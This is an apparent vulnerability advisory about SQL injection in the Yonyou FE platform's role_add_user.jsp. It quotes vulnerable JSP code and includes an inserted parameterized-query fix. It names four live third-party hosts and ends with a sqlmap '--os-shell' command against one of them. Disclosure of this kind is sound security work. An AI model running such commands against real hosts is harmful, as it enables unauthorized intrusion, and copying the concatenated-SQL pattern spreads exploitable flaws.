Generic SQL injection in a Yonyou system

2014-05-26T00:00:00
ID SSV:93254
Type seebug
Reporter Root
Modified 2014-05-26T00:00:00

Description

Brief description:

Generic SQL injection in a Yonyou system

Details:

Yonyou FE collaborative office platform, latest version. Vulnerable URL:

/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

Partial code

<%
// String searchValue=HtmlFormat.format(request.getParameter("searchValue")); // this parameter
String filter="";
Dao dao=(Dao)ResourceManage.getContext("basicDao");
FieldSet groupFs=dao.getFieldSetByFilter("SYS_GROUP","SG04='/'");
String groupName=groupFs.getString("SG03");
DataTable dataTable=null;
if(!"".equals(roleId)){
    if(!groupName.equals(dept))
        filter=" and su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ;
    else
        filter=" su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ;
}
if(!"".equals(searchValue)){
    filter=filter+" and (su02 like '%"+searchValue+"%' or SU01 like '%"+searchValue+"%')";
}
if(!groupName.equals(dept)){
    dataTable=dao.getDataTable("GROUP_USER_V"," sg03='"+dept+"'"+filter,"gu03");
}
else{
    dataTable=dao.getDataTable("SYS_USERS",filter,"SU03");
}
%>
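A parameterized rebuild of the filter in the excerpt above, where searchValue, dept and roleId are all concatenated into the SQL text. This is an added example, not the vendor's code: it uses plain JDBC rather than the platform's Dao, and the class RoleUserQuery and helper likeLiteral are hypothetical. It assumes sr00 is a numeric column and that the third getDataTable argument is the ORDER BY column.

```java
import java.sql.*;
import java.util.*;

// Added example, not Yonyou code: same query shape as the excerpt, with bound parameters.
public class RoleUserQuery {
    final StringBuilder sql = new StringBuilder();
    final List<Object> binds = new ArrayList<>();

    // Escape LIKE metacharacters (% and _) so user input matches literally (ESCAPE '!').
    static String likeLiteral(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }

    // groupName is the root group name (SG03 in the excerpt); the other inputs are untrusted.
    RoleUserQuery(String groupName, String dept, String roleId, String searchValue) {
        boolean root = groupName.equals(dept);
        sql.append(root ? "SELECT * FROM SYS_USERS WHERE 1=1"
                        : "SELECT * FROM GROUP_USER_V WHERE sg03 = ?");
        if (!root) binds.add(dept);
        if (roleId != null && !roleId.isEmpty()) {
            int role = Integer.parseInt(roleId); // assumption: sr00 is numeric; rejects anything else
            sql.append(" AND su00 NOT IN (SELECT su00 FROM user_role_v WHERE sr03 = ? AND sr00 = ?)");
            binds.add(dept);
            binds.add(role);
        }
        if (searchValue != null && !searchValue.isEmpty()) {
            String pattern = "%" + likeLiteral(searchValue) + "%";
            sql.append(" AND (su02 LIKE ? ESCAPE '!' OR SU01 LIKE ? ESCAPE '!')");
            binds.add(pattern);
            binds.add(pattern);
        }
        // Assumption: "SU03"/"gu03" in the excerpt are ORDER BY columns; they are fixed literals here.
        sql.append(root ? " ORDER BY SU03" : " ORDER BY gu03");
    }

    // Bind by position; the driver sends the values separately from the SQL text.
    PreparedStatement prepare(Connection c) throws SQLException {
        PreparedStatement ps = c.prepareStatement(sql.toString());
        for (int i = 0; i < binds.size(); i++) ps.setObject(i + 1, binds.get(i));
        return ps;
    }

    public static void main(String[] args) {
        // Constructed input: the quote in searchValue ends up in a bind value, not in the SQL.
        RoleUserQuery q = new RoleUserQuery("HQ", "1", "2", "3' --");
        System.out.println(q.sql + "\n" + q.binds);
    }
}
```

Integer.parseInt throws NumberFormatException on a non-numeric roleId, which the caller should treat as a rejected request. On SQL Server, LIKE also treats [ as a wildcard, which likeLiteral does not escape.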

The searchValue parameter is injectable. Proof:

http://oa.jiada.cc:9090/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

http://oa.shunhengli.com:9090/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

http://oa.nbsec.org:9090//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

http://oa.bnuz.edu.cn:8080//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

Proof of vulnerability:

sqlmap -u "http://oa.bnuz.edu.cn:8080//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3" -p searchValue --os-shell
